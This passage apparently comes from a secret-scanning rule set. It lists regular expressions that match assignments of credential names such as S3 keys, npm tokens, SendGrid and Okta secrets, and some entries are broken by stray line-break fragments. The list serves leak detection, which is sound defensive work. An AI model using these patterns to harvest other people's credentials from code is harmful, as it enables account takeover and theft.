"(?i)[\"']?spotify[_-]?api[_-]?access[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?spaces[_-]?secret[_-]?access[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?spaces[_-]?access[_-]?key[_-]?id[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?soundcloud[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?soundcloud[_-]?client[_-]?secret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?sonatypepassword[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?sonatype[_-]?token[_-]?user[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?sonatype[_-]?token[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?sonatype[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?sonatype[_-]?pass[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?sonatype[_-]?nexus[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?sonatype[_-]?gpg[_-]?passphrase[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?sonatype[_-]?gpg[_-]?key[_-]?name[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?sonar[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?sonar[_-]?project[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?sonar[_-]?organization[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?socrata[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?socrata[_-]?app[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?snyk[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?snyk[_-]?api[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?snoowrap[_-]?refresh[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?snoowrap[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?snoowrap[_-]?client[_-]?secret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?slate[_-]?user[_-]?email[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?slash[_-]?developer[_-]?space[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?slash[_-]?developer[_-]?space[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?signing[_-]?key[_-]?sid[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?signing[_-]?key[_-]?secret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?signing[_-]?key[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?signing[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?setsecretkey[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?setdstsecretkey[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?setdstaccesskey[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?ses[_-]?secret[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?ses[_-]?access[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?service[_-]?account[_-]?secret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?sentry[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?sentry[_-]?secret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?sentry[_-]?endpoint[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?sentry[_-]?default[_-]?org[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?sentry[_-]?auth[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?sendwithus[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?sendgrid[_-]?username[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?sendgrid[_-]?user[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?sendgrid[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?sendgrid[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?sendgrid[_-]?api[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?sendgrid[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?selion[_-]?selenium[_-]?host[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?selion[_-]?log[_-]?level[_-]?dev[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?segment[_-]?api[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?secretkey[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?secretaccesskey[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?secret[_-]?key[_-]?base[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?secret[_-]?9[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?secret[_-]?8[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?secret[_-]?7[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?secret[_-]?6[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?secret[_-]?5[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?secret[_-]?4[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?secret[_-]?3[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?secret[_-]?2[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?secret[_-]?11[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?secret[_-]?10[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?secret[_-]?1[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?secret[_-]?0[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?sdr[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?scrutinizer[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?sauce[_-]?access[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?sandbox[_-]?aws[_-]?secret[_-]?access[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?sandbox[_-]?aws[_-]?access[_-]?key[_-]?id[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?sandbox[_-]?access[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?salesforce[_-]?bulk[_-]?test[_-]?security[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?salesforce[_-]?bulk[_-]?test[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?sacloud[_-]?api[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?sacloud[_-]?access[_-]?token[_-]?secret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?sacloud[_-]?access[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?s3[_-]?user[_-]?secret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?s3[_-]?secret[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?s3[_-]?secret[_-]?assets[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?s3[_-]?secret[_-]?app[_-]?logs[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?s3[_-]?key[_-]?assets[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?s3[_-]?key[_-]?app[_-]?logs[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?s3[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?s3[_-]?external[_-]?3[_-]?amazonaws[_-]?com[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?s3[_-]?bucket[_-]?name[_-]?assets[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?s3[_-]?bucket[_-]?name[_-]?app[_-]?logs[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?s3[_-]?access[_-]?key[_-]?id[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?s3[_-]?access[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?rubygems[_-]?auth[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?rtd[_-]?store[_-]?pass[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?rtd[_-]?key[_-]?pass[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?route53[_-]?access[_-]?key[_-]?id[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?ropsten[_-]?private[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?rinkeby[_-]?private[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?rest[_-]?api[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?repotoken[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?reporting[_-]?webdav[_-]?url[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?reporting[_-]?webdav[_-]?pwd[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?release[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?release[_-]?gh[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?registry[_-]?secure[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?registry[_-]?pass[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?refresh[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?rediscloud[_-]?url[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?redis[_-]?stunnel[_-]?urls[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?randrmusicapiaccesstoken[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?rabbitmq[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?quip[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?qiita[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?pypi[_-]?passowrd[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?pushover[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?publish[_-]?secret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?publish[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?publish[_-]?access[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?project[_-]?config[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?prod[_-]?secret[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?prod[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?prod[_-]?access[_-]?key[_-]?id[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?private[_-]?signing[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?pring[_-]?mail[_-]?username[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?preferred[_-]?username[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?prebuild[_-]?auth[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?postgresql[_-]?pass[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?postgresql[_-]?db[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?postgres[_-]?env[_-]?postgres[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?postgres[_-]?env[_-]?postgres[_-]?db[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?plugin[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?plotly[_-]?apikey[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?places[_-]?apikey[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?places[_-]?api[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?pg[_-]?host[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?pg[_-]?database[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?personal[_-]?secret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?personal[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?percy[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?percy[_-]?project[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?paypal[_-]?client[_-]?secret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?passwordtravis[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?parse[_-]?js[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?pagerduty[_-]?apikey[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?packagecloud[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?ossrh[_-]?username[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?ossrh[_-]?secret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?ossrh[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?ossrh[_-]?pass[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?ossrh[_-]?jira[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?os[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?os[_-]?auth[_-]?url[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?org[_-]?project[_-]?gradle[_-]?sonatype[_-]?nexus[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?org[_-]?gradle[_-]?project[_-]?sonatype[_-]?nexus[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?openwhisk[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?open[_-]?whisk[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?onesignal[_-]?user[_-]?auth[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?onesignal[_-]?api[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?omise[_-]?skey[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?omise[_-]?pubkey[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?omise[_-]?pkey[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?omise[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?okta[_-]?oauth2[_-]?clientsecret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?okta[_-]?oauth2[_-]?client[_-]?secret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?okta[_-]?client[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?ofta[_-]?secret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?ofta[_-]?region[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?ofta[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?octest[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?octest[_-]?app[_-]?username[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?octest[_-]?app[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?oc[_-]?pass[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?object[_-]?store[_-]?creds[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?object[_-]?store[_-]?bucket[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?object[_-]?storage[_-]?region[_-]?name[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?object[_-]?storage[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?oauth[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?numbers[_-]?service[_-]?pass[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?nuget[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?nuget[_-]?apikey[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?nuget[_-]?api[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?npm[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?npm[_-]?secret[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?npm[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?npm[_-]?email[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?npm[_-]?auth[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?npm[_-]?api[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?npm[_-]?api[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?now[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?non[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?node[_-]?pre[_-]?gyp[_-]?secretaccesskey[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?node[_-]?pre[_-]?gyp[_-]?github[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?node[_-]?pre[_-]?gyp[_-]?accesskeyid[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?node[_-]?env[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?ngrok[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?ngrok[_-]?auth[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?nexuspassword[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?nexus[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?new[_-]?relic[_-]?beta[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?netlify[_-]?api[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?nativeevents[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?mysqlsecret[\"']?[^\\S\r + 